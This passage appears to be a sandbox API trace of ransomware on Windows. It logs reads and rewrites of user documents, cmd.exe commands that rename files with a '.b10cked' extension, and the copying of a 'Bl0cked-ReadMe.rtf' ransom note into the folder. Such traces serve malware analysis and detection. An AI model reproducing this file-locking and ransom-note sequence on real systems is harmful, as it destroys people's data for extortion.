"c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\g ol7oxwe18lexod.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0229.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.496] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0229.496] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28628567735) returned 1 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d81 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.497] 
SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.497] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d81 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.498] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3899 [0229.498] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d81 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0229.500] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d81 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.500] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ebf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ebf, lpOverlapped=0x0) returned 1 [0229.500] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0229.500] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ebf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ebf, lpOverlapped=0x0) returned 1 [0229.508] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-7871, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ec2 [0229.508] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ebf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ebf, lpOverlapped=0x0) returned 1 [0229.508] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-7871, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ec2 [0229.508] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ebf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 
| out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ebf, lpOverlapped=0x0) returned 1 [0229.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="g ol7OxwE18leXod.csv", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0229.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="g ol7OxwE18leXod.csv", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g ol7OxwE18leXod.csv", lpUsedDefaultChar=0x0) returned 20 [0229.513] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d81 [0229.513] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0229.514] CloseHandle (hObject=0x1b4) returned 1 [0229.515] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\g ol7OxwE18leXod.csv", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV") returned 0x48 [0229.516] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0229.517] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g 
ol7OxwE18leXod.csv.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\GOL7OX~1.CSV\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\g ol7OxwE18leXod.csv.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9e0, dwThreadId=0x938)) returned 1 [0229.551] CloseHandle (hObject=0x120) returned 1 [0229.551] CloseHandle (hObject=0x1b4) returned 1 [0229.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0229.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0229.551] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0229.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0229.551] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0229.551] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0229.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0229.551] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0229.551] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0229.551] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0229.552] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0229.552] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0229.552] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9b8, dwThreadId=0x370)) returned 1 [0229.691] CloseHandle (hObject=0x120) returned 1 [0229.691] CloseHandle (hObject=0x1b4) returned 1 [0229.691] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0x20 [0229.691] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0229.691] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0229.692] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0229.692] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.692] ReleaseMutex (hMutex=0xf8) returned 1 [0229.692] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.692] ReleaseMutex (hMutex=0xf8) returned 1 [0229.692] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.692] ReleaseMutex (hMutex=0xf8) returned 1 [0229.692] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0229.692] ReleaseMutex (hMutex=0xf8) returned 1 [0229.692] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr 
kbAeh\\RIbq701A98461 y-C _\\iyDSdIsdd3hcv.pptx" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\ribq701a98461 y-c _\\iydsdisdd3hcv.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0229.692] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.692] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.692] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.692] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28648163925) returned 1 [0229.692] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.693] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14819 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0229.694] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x14331 [0229.694] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, 